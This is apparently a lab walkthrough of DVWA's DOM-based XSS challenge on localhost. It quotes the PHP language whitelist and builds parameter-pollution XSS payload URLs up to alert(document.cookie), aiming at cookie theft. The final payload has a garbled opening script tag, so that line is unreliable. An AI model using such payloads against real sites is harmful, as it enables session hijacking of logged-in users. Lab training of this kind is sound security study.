### Objective

Run your own JavaScript in another user's browser, use this to steal the cookie of a logged in user.

Let's see if we can change the get parameter first.


Apparently not, anything that isn't in 'some' list is defaulted to English. Let's check out the source.

```php
<?php  
  
// Is there any input?  
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) { # White list the allowable languages switch ($_GET['default']) {  
        case "French":  
        case "English":  
        case "German":  
        case "Spanish": # ok break;  
        default: header ("location: ?default=English");  
            exit;  
    }  
}  
  
?>

```
Looks like there is a whitelist. Let's try some weird stuff.
I tried some HTTP Parameter Pollution and I found something interesting with this payload.
```html
http://localhost:5000/vulnerabilities/xss_d/?default=English&/vulnerabilities/xss_d/?default=alert(1)
```
The response was 
```txt
English%/vulnerabilities/xss_d/?default=alert(1)
```
It rendered.
And if we remove some more
We're left with this
```txt
English&
```
What if we try putting script tags since there are no filters for it.
```txt
http://localhost:5000/vulnerabilities/xss_d/?default=English&<script>alert(1)</script>
```
And it works!
Let's change our payload to match with our objectives.
```txt
http://localhost:5000/vulnerabilities/xss_d/?default=English&</script>alert(document.cookie)</script>
```

